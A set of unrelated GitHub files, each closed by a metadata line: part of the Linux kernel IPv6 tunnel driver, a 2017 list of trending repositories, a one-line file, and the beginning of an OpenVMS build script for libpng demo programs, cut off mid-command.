t->parms.hop_limit = p->hop_limit;
t->parms.encap_limit = p->encap_limit;
t->parms.flowinfo = p->flowinfo;
t->parms.link = p->link;
t->parms.proto = p->proto;
ip6_tnl_dst_reset(t);
ip6_tnl_link_config(t);
return 0;
}
static int ip6_tnl_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p)
{
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
int err;
ip6_tnl_unlink(ip6n, t);
synchronize_net();
err = ip6_tnl_change(t, p);
ip6_tnl_link(ip6n, t);
netdev_state_change(t->dev);
return err;
}
static int ip6_tnl0_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p)
{
/* for default tnl0 device allow to change only the proto */
t->parms.proto = p->proto;
netdev_state_change(t->dev);
return 0;
}
static void
ip6_tnl_parm_from_user(struct __ip6_tnl_parm *p, const struct ip6_tnl_parm *u)
{
p->laddr = u->laddr;
p->raddr = u->raddr;
p->flags = u->flags;
p->hop_limit = u->hop_limit;
p->encap_limit = u->encap_limit;
p->flowinfo = u->flowinfo;
p->link = u->link;
p->proto = u->proto;
memcpy(p->name, u->name, sizeof(u->name));
}
static void
ip6_tnl_parm_to_user(struct ip6_tnl_parm *u, const struct __ip6_tnl_parm *p)
{
u->laddr = p->laddr;
u->raddr = p->raddr;
u->flags = p->flags;
u->hop_limit = p->hop_limit;
u->encap_limit = p->encap_limit;
u->flowinfo = p->flowinfo;
u->link = p->link;
u->proto = p->proto;
memcpy(u->name, p->name, sizeof(u->name));
}
/**
* ip6_tnl_ioctl - configure ipv6 tunnels from userspace
* @dev: virtual device associated with tunnel
* @ifr: parameters passed from userspace
* @cmd: command to be performed
*
* Description:
* ip6_tnl_ioctl() is used for managing IPv6 tunnels
* from userspace.
*
* The possible commands are the following:
* %SIOCGETTUNNEL: get tunnel parameters for device
* %SIOCADDTUNNEL: add tunnel matching given tunnel parameters
* %SIOCCHGTUNNEL: change tunnel parameters to those given
* %SIOCDELTUNNEL: delete tunnel
*
* The fallback device "ip6tnl0", created during module
* initialization, can be used for creating other tunnel devices.
*
* Return:
* 0 on success,
* %-EFAULT if unable to copy data to or from userspace,
* %-EPERM if current process hasn't %CAP_NET_ADMIN set
* %-EINVAL if passed tunnel parameters are invalid,
* %-EEXIST if changing a tunnel's parameters would cause a conflict
* %-ENODEV if attempting to change or delete a nonexisting device
**/
static int
ip6_tnl_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
{
int err = 0;
struct ip6_tnl_parm p;
struct __ip6_tnl_parm p1;
struct ip6_tnl *t = netdev_priv(dev);
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
switch (cmd) {
case SIOCGETTUNNEL:
if (dev == ip6n->fb_tnl_dev) {
if (copy_from_user(&p, ifr->ifr_ifru.ifru_data, sizeof(p))) {
err = -EFAULT;
break;
}
ip6_tnl_parm_from_user(&p1, &p);
t = ip6_tnl_locate(net, &p1, 0);
if (IS_ERR(t))
t = netdev_priv(dev);
} else {
memset(&p, 0, sizeof(p));
}
ip6_tnl_parm_to_user(&p, &t->parms);
if (copy_to_user(ifr->ifr_ifru.ifru_data, &p, sizeof(p))) {
err = -EFAULT;
}
break;
case SIOCADDTUNNEL:
case SIOCCHGTUNNEL:
err = -EPERM;
if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
break;
err = -EFAULT;
if (copy_from_user(&p, ifr->ifr_ifru.ifru_data, sizeof(p)))
break;
err = -EINVAL;
if (p.proto != IPPROTO_IPV6 && p.proto != IPPROTO_IPIP &&
p.proto != 0)
break;
ip6_tnl_parm_from_user(&p1, &p);
t = ip6_tnl_locate(net, &p1, cmd == SIOCADDTUNNEL);
if (cmd == SIOCCHGTUNNEL) {
if (!IS_ERR(t)) {
if (t->dev != dev) {
err = -EEXIST;
break;
}
} else
t = netdev_priv(dev);
if (dev == ip6n->fb_tnl_dev)
err = ip6_tnl0_update(t, &p1);
else
err = ip6_tnl_update(t, &p1);
}
if (!IS_ERR(t)) {
err = 0;
ip6_tnl_parm_to_user(&p, &t->parms);
if (copy_to_user(ifr->ifr_ifru.ifru_data, &p, sizeof(p)))
err = -EFAULT;
} else {
err = PTR_ERR(t);
}
break;
case SIOCDELTUNNEL:
err = -EPERM;
if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
break;
if (dev == ip6n->fb_tnl_dev) {
err = -EFAULT;
if (copy_from_user(&p, ifr->ifr_ifru.ifru_data, sizeof(p)))
break;
err = -ENOENT;
ip6_tnl_parm_from_user(&p1, &p);
t = ip6_tnl_locate(net, &p1, 0);
if (IS_ERR(t))
break;
err = -EPERM;
if (t->dev == ip6n->fb_tnl_dev)
break;
dev = t->dev;
}
err = 0;
unregister_netdevice(dev);
break;
default:
err = -EINVAL;
}
return err;
}
/**
* ip6_tnl_change_mtu - change mtu manually for tunnel device
* @dev: virtual device associated with tunnel
* @new_mtu: the new mtu
*
* Return:
* 0 on success,
* %-EINVAL if mtu too small
**/
static int
ip6_tnl_change_mtu(struct net_device *dev, int new_mtu)
{
struct ip6_tnl *tnl = netdev_priv(dev);
if (tnl->parms.proto == IPPROTO_IPIP) {
if (new_mtu < 68)
return -EINVAL;
} else {
if (new_mtu < IPV6_MIN_MTU)
return -EINVAL;
}
if (new_mtu > 0xFFF8 - dev->hard_header_len)
return -EINVAL;
dev->mtu = new_mtu;
return 0;
}
static const struct net_device_ops ip6_tnl_netdev_ops = {
.ndo_init = ip6_tnl_dev_init,
.ndo_uninit = ip6_tnl_dev_uninit,
.ndo_start_xmit = ip6_tnl_xmit,
.ndo_do_ioctl = ip6_tnl_ioctl,
.ndo_change_mtu = ip6_tnl_change_mtu,
.ndo_get_stats = ip6_get_stats,
};
/**
* ip6_tnl_dev_setup - setup virtual tunnel device
* @dev: virtual device associated with tunnel
*
* Description:
* Initialize function pointers and device parameters
**/
static void ip6_tnl_dev_setup(struct net_device *dev)
{
struct ip6_tnl *t;
dev->netdev_ops = &ip6_tnl_netdev_ops;
dev->destructor = ip6_dev_free;
dev->type = ARPHRD_TUNNEL6;
dev->hard_header_len = LL_MAX_HEADER + sizeof(struct ipv6hdr);
dev->mtu = ETH_DATA_LEN - sizeof(struct ipv6hdr);
t = netdev_priv(dev);
if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
dev->mtu -= 8;
dev->flags |= IFF_NOARP;
dev->addr_len = sizeof(struct in6_addr);
netif_keep_dst(dev);
/* This perm addr will be used as interface identifier by IPv6 */
dev->addr_assign_type = NET_ADDR_RANDOM;
eth_random_addr(dev->perm_addr);
}
/**
* ip6_tnl_dev_init_gen - general initializer for all tunnel devices
* @dev: virtual device associated with tunnel
**/
static inline int
ip6_tnl_dev_init_gen(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
t->dev = dev;
t->net = dev_net(dev);
dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
if (!dev->tstats)
return -ENOMEM;
return 0;
}
/**
* ip6_tnl_dev_init - initializer for all non fallback tunnel devices
* @dev: virtual device associated with tunnel
**/
static int ip6_tnl_dev_init(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
int err = ip6_tnl_dev_init_gen(dev);
if (err)
return err;
ip6_tnl_link_config(t);
return 0;
}
/**
* ip6_fb_tnl_dev_init - initializer for fallback tunnel device
* @dev: fallback device
*
* Return: 0
**/
static int __net_init ip6_fb_tnl_dev_init(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
struct net *net = dev_net(dev);
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
t->parms.proto = IPPROTO_IPV6;
dev_hold(dev);
rcu_assign_pointer(ip6n->tnls_wc[0], t);
return 0;
}
static int ip6_tnl_validate(struct nlattr *tb[], struct nlattr *data[])
{
u8 proto;
if (!data || !data[IFLA_IPTUN_PROTO])
return 0;
proto = nla_get_u8(data[IFLA_IPTUN_PROTO]);
if (proto != IPPROTO_IPV6 &&
proto != IPPROTO_IPIP &&
proto != 0)
return -EINVAL;
return 0;
}
static void ip6_tnl_netlink_parms(struct nlattr *data[],
struct __ip6_tnl_parm *parms)
{
memset(parms, 0, sizeof(*parms));
if (!data)
return;
if (data[IFLA_IPTUN_LINK])
parms->link = nla_get_u32(data[IFLA_IPTUN_LINK]);
if (data[IFLA_IPTUN_LOCAL])
nla_memcpy(&parms->laddr, data[IFLA_IPTUN_LOCAL],
sizeof(struct in6_addr));
if (data[IFLA_IPTUN_REMOTE])
nla_memcpy(&parms->raddr, data[IFLA_IPTUN_REMOTE],
sizeof(struct in6_addr));
if (data[IFLA_IPTUN_TTL])
parms->hop_limit = nla_get_u8(data[IFLA_IPTUN_TTL]);
if (data[IFLA_IPTUN_ENCAP_LIMIT])
parms->encap_limit = nla_get_u8(data[IFLA_IPTUN_ENCAP_LIMIT]);
if (data[IFLA_IPTUN_FLOWINFO])
parms->flowinfo = nla_get_be32(data[IFLA_IPTUN_FLOWINFO]);
if (data[IFLA_IPTUN_FLAGS])
parms->flags = nla_get_u32(data[IFLA_IPTUN_FLAGS]);
if (data[IFLA_IPTUN_PROTO])
parms->proto = nla_get_u8(data[IFLA_IPTUN_PROTO]);
}
static int ip6_tnl_newlink(struct net *src_net, struct net_device *dev,
struct nlattr *tb[], struct nlattr *data[])
{
struct net *net = dev_net(dev);
struct ip6_tnl *nt, *t;
nt = netdev_priv(dev);
ip6_tnl_netlink_parms(data, &nt->parms);
t = ip6_tnl_locate(net, &nt->parms, 0);
if (!IS_ERR(t))
return -EEXIST;
return ip6_tnl_create2(dev);
}
static int ip6_tnl_changelink(struct net_device *dev, struct nlattr *tb[],
struct nlattr *data[])
{
struct ip6_tnl *t = netdev_priv(dev);
struct __ip6_tnl_parm p;
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
if (dev == ip6n->fb_tnl_dev)
return -EINVAL;
ip6_tnl_netlink_parms(data, &p);
t = ip6_tnl_locate(net, &p, 0);
if (!IS_ERR(t)) {
if (t->dev != dev)
return -EEXIST;
} else
t = netdev_priv(dev);
return ip6_tnl_update(t, &p);
}
static void ip6_tnl_dellink(struct net_device *dev, struct list_head *head)
{
struct net *net = dev_net(dev);
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
if (dev != ip6n->fb_tnl_dev)
unregister_netdevice_queue(dev, head);
}
static size_t ip6_tnl_get_size(const struct net_device *dev)
{
return
/* IFLA_IPTUN_LINK */
nla_total_size(4) +
/* IFLA_IPTUN_LOCAL */
nla_total_size(sizeof(struct in6_addr)) +
/* IFLA_IPTUN_REMOTE */
nla_total_size(sizeof(struct in6_addr)) +
/* IFLA_IPTUN_TTL */
nla_total_size(1) +
/* IFLA_IPTUN_ENCAP_LIMIT */
nla_total_size(1) +
/* IFLA_IPTUN_FLOWINFO */
nla_total_size(4) +
/* IFLA_IPTUN_FLAGS */
nla_total_size(4) +
/* IFLA_IPTUN_PROTO */
nla_total_size(1) +
0;
}
static int ip6_tnl_fill_info(struct sk_buff *skb, const struct net_device *dev)
{
struct ip6_tnl *tunnel = netdev_priv(dev);
struct __ip6_tnl_parm *parm = &tunnel->parms;
if (nla_put_u32(skb, IFLA_IPTUN_LINK, parm->link) ||
nla_put(skb, IFLA_IPTUN_LOCAL, sizeof(struct in6_addr),
&parm->laddr) ||
nla_put(skb, IFLA_IPTUN_REMOTE, sizeof(struct in6_addr),
&parm->raddr) ||
nla_put_u8(skb, IFLA_IPTUN_TTL, parm->hop_limit) ||
nla_put_u8(skb, IFLA_IPTUN_ENCAP_LIMIT, parm->encap_limit) ||
nla_put_be32(skb, IFLA_IPTUN_FLOWINFO, parm->flowinfo) ||
nla_put_u32(skb, IFLA_IPTUN_FLAGS, parm->flags) ||
nla_put_u8(skb, IFLA_IPTUN_PROTO, parm->proto))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
struct net *ip6_tnl_get_link_net(const struct net_device *dev)
{
struct ip6_tnl *tunnel = netdev_priv(dev);
return tunnel->net;
}
EXPORT_SYMBOL(ip6_tnl_get_link_net);
static const struct nla_policy ip6_tnl_policy[IFLA_IPTUN_MAX + 1] = {
[IFLA_IPTUN_LINK] = { .type = NLA_U32 },
[IFLA_IPTUN_LOCAL] = { .len = sizeof(struct in6_addr) },
[IFLA_IPTUN_REMOTE] = { .len = sizeof(struct in6_addr) },
[IFLA_IPTUN_TTL] = { .type = NLA_U8 },
[IFLA_IPTUN_ENCAP_LIMIT] = { .type = NLA_U8 },
[IFLA_IPTUN_FLOWINFO] = { .type = NLA_U32 },
[IFLA_IPTUN_FLAGS] = { .type = NLA_U32 },
[IFLA_IPTUN_PROTO] = { .type = NLA_U8 },
};
static struct rtnl_link_ops ip6_link_ops __read_mostly = {
.kind = "ip6tnl",
.maxtype = IFLA_IPTUN_MAX,
.policy = ip6_tnl_policy,
.priv_size = sizeof(struct ip6_tnl),
.setup = ip6_tnl_dev_setup,
.validate = ip6_tnl_validate,
.newlink = ip6_tnl_newlink,
.changelink = ip6_tnl_changelink,
.dellink = ip6_tnl_dellink,
.get_size = ip6_tnl_get_size,
.fill_info = ip6_tnl_fill_info,
.get_link_net = ip6_tnl_get_link_net,
};
static struct xfrm6_tunnel ip4ip6_handler __read_mostly = {
.handler = ip4ip6_rcv,
.err_handler = ip4ip6_err,
.priority = 1,
};
static struct xfrm6_tunnel ip6ip6_handler __read_mostly = {
.handler = ip6ip6_rcv,
.err_handler = ip6ip6_err,
.priority = 1,
};
static void __net_exit ip6_tnl_destroy_tunnels(struct net *net)
{
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
struct net_device *dev, *aux;
int h;
struct ip6_tnl *t;
LIST_HEAD(list);
for_each_netdev_safe(net, dev, aux)
if (dev->rtnl_link_ops == &ip6_link_ops)
unregister_netdevice_queue(dev, &list);
for (h = 0; h < HASH_SIZE; h++) {
t = rtnl_dereference(ip6n->tnls_r_l[h]);
while (t != NULL) {
/* If dev is in the same netns, it has already
* been added to the list by the previous loop.
*/
if (!net_eq(dev_net(t->dev), net))
unregister_netdevice_queue(t->dev, &list);
t = rtnl_dereference(t->next);
}
}
unregister_netdevice_many(&list);
}
static int __net_init ip6_tnl_init_net(struct net *net)
{
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
struct ip6_tnl *t = NULL;
int err;
ip6n->tnls[0] = ip6n->tnls_wc;
ip6n->tnls[1] = ip6n->tnls_r_l;
err = -ENOMEM;
ip6n->fb_tnl_dev = alloc_netdev(sizeof(struct ip6_tnl), "ip6tnl0",
NET_NAME_UNKNOWN, ip6_tnl_dev_setup);
if (!ip6n->fb_tnl_dev)
goto err_alloc_dev;
dev_net_set(ip6n->fb_tnl_dev, net);
ip6n->fb_tnl_dev->rtnl_link_ops = &ip6_link_ops;
/* FB netdevice is special: we have one, and only one per netns.
* Allowing to move it to another netns is clearly unsafe.
*/
ip6n->fb_tnl_dev->features |= NETIF_F_NETNS_LOCAL;
err = ip6_fb_tnl_dev_init(ip6n->fb_tnl_dev);
if (err < 0)
goto err_register;
err = register_netdev(ip6n->fb_tnl_dev);
if (err < 0)
goto err_register;
t = netdev_priv(ip6n->fb_tnl_dev);
strcpy(t->parms.name, ip6n->fb_tnl_dev->name);
return 0;
err_register:
ip6_dev_free(ip6n->fb_tnl_dev);
err_alloc_dev:
return err;
}
static void __net_exit ip6_tnl_exit_net(struct net *net)
{
rtnl_lock();
ip6_tnl_destroy_tunnels(net);
rtnl_unlock();
}
static struct pernet_operations ip6_tnl_net_ops = {
.init = ip6_tnl_init_net,
.exit = ip6_tnl_exit_net,
.id = &ip6_tnl_net_id,
.size = sizeof(struct ip6_tnl_net),
};
/**
* ip6_tunnel_init - register protocol and reserve needed resources
*
* Return: 0 on success
**/
static int __init ip6_tunnel_init(void)
{
int err;
err = register_pernet_device(&ip6_tnl_net_ops);
if (err < 0)
goto out_pernet;
err = xfrm6_tunnel_register(&ip4ip6_handler, AF_INET);
if (err < 0) {
pr_err("%s: can't register ip4ip6\n", __func__);
goto out_ip4ip6;
}
err = xfrm6_tunnel_register(&ip6ip6_handler, AF_INET6);
if (err < 0) {
pr_err("%s: can't register ip6ip6\n", __func__);
goto out_ip6ip6;
}
err = rtnl_link_register(&ip6_link_ops);
if (err < 0)
goto rtnl_link_failed;
return 0;
rtnl_link_failed:
xfrm6_tunnel_deregister(&ip6ip6_handler, AF_INET6);
out_ip6ip6:
xfrm6_tunnel_deregister(&ip4ip6_handler, AF_INET);
out_ip4ip6:
unregister_pernet_device(&ip6_tnl_net_ops);
out_pernet:
return err;
}
/**
* ip6_tunnel_cleanup - free resources and unregister protocol
**/
static void __exit ip6_tunnel_cleanup(void)
{
rtnl_link_unregister(&ip6_link_ops);
if (xfrm6_tunnel_deregister(&ip4ip6_handler, AF_INET))
pr_info("%s: can't deregister ip4ip6\n", __func__);
if (xfrm6_tunnel_deregister(&ip6ip6_handler, AF_INET6))
pr_info("%s: can't deregister ip6ip6\n", __func__);
unregister_pernet_device(&ip6_tnl_net_ops);
}
module_init(ip6_tunnel_init);
module_exit(ip6_tunnel_cleanup);
| {
"pile_set_name": "Github"
} |
## 2017-06-24
#### python
* [plotly / dash](https://github.com/plotly/dash):Interactive, reactive web apps in pure python ⭐️
* [tensorflow / tensor2tensor](https://github.com/tensorflow/tensor2tensor):A library for generalized sequence to sequence models
* [tensorflow / models](https://github.com/tensorflow/models):Models built with TensorFlow
* [astorfi / TensorFlow-World](https://github.com/astorfi/TensorFlow-World):
* [iadgov / goSecure](https://github.com/iadgov/goSecure):An easy to use and portable Virtual Private Network (VPN) system built with Linux and a Raspberry Pi. iadgov
* [eladhoffer / seq2seq.pytorch](https://github.com/eladhoffer/seq2seq.pytorch):Sequence-to-Sequence learning using PyTorch
* [fchollet / keras](https://github.com/fchollet/keras):Deep Learning library for Python. Runs on TensorFlow, Theano, or CNTK.
* [elceef / dnstwist](https://github.com/elceef/dnstwist):Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
* [NationalSecurityAgency / lemongraph](https://github.com/NationalSecurityAgency/lemongraph):Log-based transactional graph engine
* [pallets / flask](https://github.com/pallets/flask):A microframework based on Werkzeug, Jinja2 and good intentions
* [xiyouMc / ncmbot](https://github.com/xiyouMc/ncmbot):NeteaseCloudMusic Bot for Philharmonic™. ✨ 🍰 ✨ 网易云音乐 Python 组件库,用 Python 玩转网易云音乐
* [ApacheInfra / superset](https://github.com/ApacheInfra/superset):Apache Superset (incubating) is a modern, enterprise-ready business intelligence web application
* [shadowsocks / shadowsocks](https://github.com/shadowsocks/shadowsocks):
* [XX-net / XX-Net](https://github.com/XX-net/XX-Net):a web proxy tool
* [vinta / awesome-python](https://github.com/vinta/awesome-python):A curated list of awesome Python frameworks, libraries, software and resources
* [django / django](https://github.com/django/django):The Web framework for perfectionists with deadlines.
* [python / cpython](https://github.com/python/cpython):The Python programming language
* [samrayleung / jd_spider](https://github.com/samrayleung/jd_spider):两只蠢萌京东的分布式爬虫.
* [rg3 / youtube-dl](https://github.com/rg3/youtube-dl):Command-line program to download videos from YouTube.com and other video sites
* [scrapy / scrapy](https://github.com/scrapy/scrapy):Scrapy, a fast high-level web crawling & scraping framework for Python.
* [LaoDar / cnn_head_pose_estimator](https://github.com/LaoDar/cnn_head_pose_estimator):a simple and fast mxnet version CNN based head pose estimator
* [soimort / you-get](https://github.com/soimort/you-get):⏬ Dumb downloader that scrapes the web
* [leostat / rtfm](https://github.com/leostat/rtfm):A database of common, interesting or useful commands, in one handy referable form
* [josephmisiti / awesome-machine-learning](https://github.com/josephmisiti/awesome-machine-learning):A curated list of awesome Machine Learning frameworks, libraries and software.
* [donnemartin / system-design-primer](https://github.com/donnemartin/system-design-primer):Learn how to design large-scale systems. Prep for the system design interview. Includes Anki flashcards.
#### swift
* [toineheuvelmans / Metron](https://github.com/toineheuvelmans/Metron):Geometry, simplified.
* [atomic14 / VisionCoreMLSample](https://github.com/atomic14/VisionCoreMLSample):Sample application using Vision Framework and Core ML
* [loregr / LGButton](https://github.com/loregr/LGButton):A fully customisable subclass of the native UIControl which allows you to create beautiful buttons without writing any line of code.
* [artemnovichkov / iOS-11-by-Examples](https://github.com/artemnovichkov/iOS-11-by-Examples):Examples of new iOS 11 APIs
* [raywenderlich / swift-algorithm-club](https://github.com/raywenderlich/swift-algorithm-club):Algorithms and data structures in Swift, with explanations!
* [xmartlabs / Bender](https://github.com/xmartlabs/Bender):Easily craft fast Neural Networks on iOS! Use TensorFlow models. Metal under the hood.
* [patchthecode / JTAppleCalendar](https://github.com/patchthecode/JTAppleCalendar):The Unofficial Swift Apple Calendar Library. View. Control. for iOS & tvOS
* [chriseidhof / tea-in-swift](https://github.com/chriseidhof/tea-in-swift):The Elm Architecture in Swift
* [luckytianyiyan / TySimulator](https://github.com/luckytianyiyan/TySimulator):The utility for fast access to your iPhone Simulator apps.
* [lkzhao / Hero](https://github.com/lkzhao/Hero):Elegant transition library for iOS & tvOS
* [Clean-Swift / CleanStore](https://github.com/Clean-Swift/CleanStore):A sample iOS app built using the Clean Swift architecture. Clean Swift is Uncle Bob's Clean Architecture applied to iOS and Mac projects. CleanStore demonstrates Clean Swift by implementing the create order use case described by in Uncle Bob's talks.
* [ReSwift / ReSwift](https://github.com/ReSwift/ReSwift):Unidirectional Data Flow in Swift - Inspired by Redux
* [vsouza / awesome-ios](https://github.com/vsouza/awesome-ios):A curated list of awesome iOS ecosystem, including Objective-C and Swift Projects
* [dkhamsing / open-source-ios-apps](https://github.com/dkhamsing/open-source-ios-apps):📱 Collaborative List of Open-Source iOS Apps
* [Carthage / Carthage](https://github.com/Carthage/Carthage):A simple, decentralized dependency manager for Cocoa
* [hollance / YOLO-CoreML-MPSNNGraph](https://github.com/hollance/YOLO-CoreML-MPSNNGraph):Tiny YOLO for iOS implemented using CoreML but also using the new MPS graph API.
* [vapor / vapor](https://github.com/vapor/vapor):A server-side Swift web framework.
* [ReactiveX / RxSwift](https://github.com/ReactiveX/RxSwift):Reactive Programming in Swift
* [Alamofire / Alamofire](https://github.com/Alamofire/Alamofire):Elegant HTTP Networking in Swift
* [Moya / Moya](https://github.com/Moya/Moya):Network abstraction layer written in Swift.
* [danielgindi / Charts](https://github.com/danielgindi/Charts):Beautiful charts for iOS/tvOS/OSX! The Apple side of the crossplatform MPAndroidChart.
* [lhc70000 / iina](https://github.com/lhc70000/iina):The modern video player for macOS.
* [jegumhon / URWeatherView](https://github.com/jegumhon/URWeatherView):Show the weather effects onto view written in Swift3
* [okhanokbay / ExpyTableView](https://github.com/okhanokbay/ExpyTableView):Make your own expandable table view with one method. Written in Swift 3.
* [CosmicMind / Material](https://github.com/CosmicMind/Material):An animation and graphics framework for Material Design in Swift.
#### javascript
* [jondot / react-flight](https://github.com/jondot/react-flight):The best way to build animation compositions for React.
* [grab / front-end-guide](https://github.com/grab/front-end-guide):📚 Study guide and introduction to the modern front end stack.
* [dabbott / react-express](https://github.com/dabbott/react-express):The all-in-one beginner's guide to modern React application development!
* [typicode / json-server](https://github.com/typicode/json-server):Get a full fake REST API with zero coding in less than 30 seconds (seriously)
* [brakmic / BlockchainStore](https://github.com/brakmic/BlockchainStore):💰 Retail Store that runs on Ethereum
* [webkul / coolhue](https://github.com/webkul/coolhue):Coolest Gradient Hues and Swatches by UVdesk
* [paulsonnentag / swip](https://github.com/paulsonnentag/swip):a library to create multi device experiments
* [facebook / react](https://github.com/facebook/react):A declarative, efficient, and flexible JavaScript library for building user interfaces.
* [vuejs / vue](https://github.com/vuejs/vue):A progressive, incrementally-adoptable JavaScript framework for building UI on the web.
* [intercellular / cell](https://github.com/intercellular/cell):A self-driving web app framework
* [getify / You-Dont-Know-JS](https://github.com/getify/You-Dont-Know-JS):A book series on JavaScript. @YDKJS on twitter.
* [facebookincubator / create-react-app](https://github.com/facebookincubator/create-react-app):Create React apps with no build configuration.
* [OptimalBits / redbird](https://github.com/OptimalBits/redbird):A modern reverse proxy for node
* [ecrmnn / collect.js](https://github.com/ecrmnn/collect.js):Convenient and dependency free wrapper for working with arrays and objects
* [pixijs / pixi.js](https://github.com/pixijs/pixi.js):Super fast HTML 5 2D rendering engine that uses webGL with canvas fallback
* [prettier / prettier](https://github.com/prettier/prettier):Prettier is an opinionated code formatter.
* [jakubgarfield / expenses](https://github.com/jakubgarfield/expenses):💰 Expense tracker using Google Sheets 📉 as a storage written in React
* [twbs / bootstrap](https://github.com/twbs/bootstrap):The most popular HTML, CSS, and JavaScript framework for developing responsive, mobile first projects on the web.
* [mzabriskie / axios](https://github.com/mzabriskie/axios):Promise based HTTP client for the browser and node.js
* [sindresorhus / refined-github](https://github.com/sindresorhus/refined-github):Browser extension that simplifies the GitHub interface and adds useful features
* [airbnb / javascript](https://github.com/airbnb/javascript):JavaScript Style Guide
* [facebook / react-native](https://github.com/facebook/react-native):A framework for building native apps with React.
* [gpbl / react-day-picker](https://github.com/gpbl/react-day-picker):Flexible date picker for React
* [deepstreamIO / golden-layout](https://github.com/deepstreamIO/golden-layout):The ultimate Javascript layout manager
* [cantierecreativo / redux-bees](https://github.com/cantierecreativo/redux-bees):A nice, short and declarative way to interact with JSON APIs
#### go
* [nuveo / prest](https://github.com/nuveo/prest):A fully RESTful API from any existing PostgreSQL database writting in Go
* [bradfitz / tcpproxy](https://github.com/bradfitz/tcpproxy):Go package for writing TCP proxies, routing based on HTTP Host headers and SNI server names.
* [fogleman / pack3d](https://github.com/fogleman/pack3d):Tightly pack 3D models.
* [ethereum / go-ethereum](https://github.com/ethereum/go-ethereum):Official Go implementation of the Ethereum protocol
* [upspin / upspin](https://github.com/upspin/upspin):Upspin: A framework for naming everyone's everything.
* [kubernetes / kubernetes](https://github.com/kubernetes/kubernetes):Production-Grade Container Scheduling and Management
* [golang / go](https://github.com/golang/go):The Go programming language
* [go-macaron / macaron](https://github.com/go-macaron/macaron):Package macaron is a high productive and modular web framework in Go.
* [avelino / awesome-go](https://github.com/avelino/awesome-go):A curated list of awesome Go frameworks, libraries and software
* [rqlite / rqlite](https://github.com/rqlite/rqlite):The lightweight, distributed relational database built on SQLite.
* [rs / zerolog](https://github.com/rs/zerolog):Zero Allocation JSON Logger
* [gobuffalo / packr](https://github.com/gobuffalo/packr):The simple and easy way to embed static files into Go binaries.
* [tmrts / go-patterns](https://github.com/tmrts/go-patterns):Curated list of Go design patterns, recipes and idioms
* [gohugoio / hugo](https://github.com/gohugoio/hugo):A Fast and Flexible Static Site Generator built with love in GoLang.
* [NebulousLabs / Sia](https://github.com/NebulousLabs/Sia):Blockchain-based marketplace for file storage
* [istio / istio](https://github.com/istio/istio):Sample code, build and tests and governance material for the Istio project.
* [gogits / gogs](https://github.com/gogits/gogs):Gogs is a painless self-hosted Git service.
* [hajimehoshi / go-mp3](https://github.com/hajimehoshi/go-mp3):An MP3 decoder in pure Go
* [moby / moby](https://github.com/moby/moby):Moby Project - a collaborative project for the container ecosystem to assemble container-based systems
* [prometheus / prometheus](https://github.com/prometheus/prometheus):The Prometheus monitoring system and time series database.
* [grafana / grafana](https://github.com/grafana/grafana):The tool for beautiful monitoring and metric analytics & dashboards for Graphite, InfluxDB & Prometheus & More
* [apex / apex](https://github.com/apex/apex):Build, deploy, and manage AWS Lambda functions with ease (with Go support!).
* [fatedier / frp](https://github.com/fatedier/frp):A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.
* [Unknwon / the-way-to-go_ZH_CN](https://github.com/Unknwon/the-way-to-go_ZH_CN):《The Way to Go》中文译本,中文正式名《Go入门指南》
* [drone / drone](https://github.com/drone/drone):Drone is a Continuous Delivery platform built on Docker, written in Go
| {
"pile_set_name": "Github"
} |
-c
| {
"pile_set_name": "Github"
} |
$!------------------------------------------------------------------------------
$! make "PNG: The Definitive Guide" demo programs (for X) under OpenVMS
$!
$! Script created by Martin Zinser for libpng; modified by Greg Roelofs
$! for standalone pngbook source distribution.
$!
$!
$! Set locations where zlib and libpng sources live.
$!
$ zpath = ""
$ pngpath = ""
$!
$ if f$search("[---.zlib]zlib.h").nes."" then zpath = "[---.zlib]"
$ if f$search("[--]png.h").nes."" then pngpath = "[--]"
$!
$ if f$search("[-.zlib]zlib.h").nes."" then zpath = "[-.zlib]"
$ if f$search("[-.libpng]png.h").nes."" then pngpath = "[-.libpng]"
$!
$ if zpath .eqs. ""
$ then
$ write sys$output "zlib include not found. Exiting..."
$ exit 2
$ endif
$!
$ if pngpath .eqs. ""
$ then
$ write sys$output "libpng include not found. Exiting..."
$ exit 2
$ endif
$!
$! Look for the compiler used.
$!
$ ccopt="/include=(''zpath',''pngpath')"
$ if f$getsyi("HW_MODEL").ge.1024
$ then
$ ccopt = "/prefix=all"+ccopt
$ comp = "__decc__=1"
$ if f$trnlnm("SYS").eqs."" then define sys sys$library:
$ else
$ if f$search("SYS$SYSTEM:DECC$COMPILER.EXE").eqs.""
$ then
$ if f$trnlnm("SYS").eqs."" then define sys sys$library:
$ if f$search("SYS$SYSTEM:VAXC.EXE").eqs.""
$ then
$ comp = "__gcc__=1"
$ CC :== GCC
$ else
$ comp = "__vaxc__=1"
$ endif
$ else
$ if f$trnlnm("SYS").eqs."" then define sys decc$library_include:
$ ccopt = "/decc/prefix=all"+ccopt
$ comp = "__decc__=1"
$ endif
$ endif
$ open/write lopt lib.opt
$ write lopt "''pngpath'libpng.olb/lib"
$ write lopt "''zpath'libz.olb/lib"
$ close lopt
$ open/write xopt x11.opt
$ write xopt "sys$library:decw$xlibshr.exe/share"
$ close xopt
$!
$! Build 'em.
$!
$ write sys$output "Compiling PNG book programs ..."
$ CALL MAKE readpng.OBJ "cc ''CCOPT' readpng" -
